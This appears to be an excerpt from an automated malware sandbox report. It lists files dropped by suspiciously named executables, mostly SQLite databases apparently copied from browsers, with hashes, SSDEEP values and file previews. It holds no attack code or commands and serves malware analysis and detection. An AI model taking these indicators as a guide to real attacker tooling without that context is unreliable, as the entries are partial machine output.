                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):5242880
                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):98304
                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5707520969659783
Encrypted:false
SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:9F6D153D934BCC50E8BC57E7014B201A
SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7873599747470391
Encrypted:false
SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7873599747470391
Encrypted:false
SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.293660689688184
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:FCpTXRug5Mi:SzRugR
                                                                                                MD5:F84BF171C1D874A8CE02AC2471447178
                                                                                                SHA1:D0D7F219F0478DEE1CE7F829672991D91F902541
                                                                                                SHA-256:5CFA7F51175DCC5EA6A3A59380818A5DFBCA80392D8A177A68A8DCE71975ACB3
                                                                                                SHA-512:0FE50E7B9F9F7E55B3682FECD5B25B1188DDB686BED1263D905E4CB185BDB95D4F440F7A10C13A38E27C1C969D264F65DF15E358B95A5F981850578145AB168F
                                                                                                Malicious:false
                                                                                                Preview:BaI8en86v0yMFHFJXQ8GCkToG
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
